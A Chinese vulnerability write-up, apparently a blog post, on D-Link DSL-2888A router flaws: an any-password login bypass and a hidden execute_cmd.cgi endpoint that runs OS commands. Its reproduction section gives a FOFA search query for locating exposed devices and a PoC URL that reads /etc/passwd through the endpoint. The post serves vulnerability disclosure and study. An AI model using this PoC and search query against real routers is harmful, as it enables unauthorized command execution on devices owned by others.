D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)

D-LinkDSL-2888AAU在特定版本中存在安全漏洞,允许经过身份验证的用户通过未公开的executecmd.cgi特性执行操作系统命令。同时,设备还存在一个认证漏洞(CVE-2020-24580),用户可以输入任意密码访问路由器。攻击者可利用这些漏洞进行远程命令执行,例如通过http://IP/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=cat%20/etc/passwd进行poc测试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞描述

D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。 在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。

漏洞影响

D-Link DSL-2888A

FOFA #

body="DSL-2888A"

漏洞复现

登录页面输入任意密码建立连接

 当输入错误密码时链接会跳到http://IP/page/login/login.html?error=fail

修改为poc即可远程执行命令


http://IP/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=cat%20/etc/passwd

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值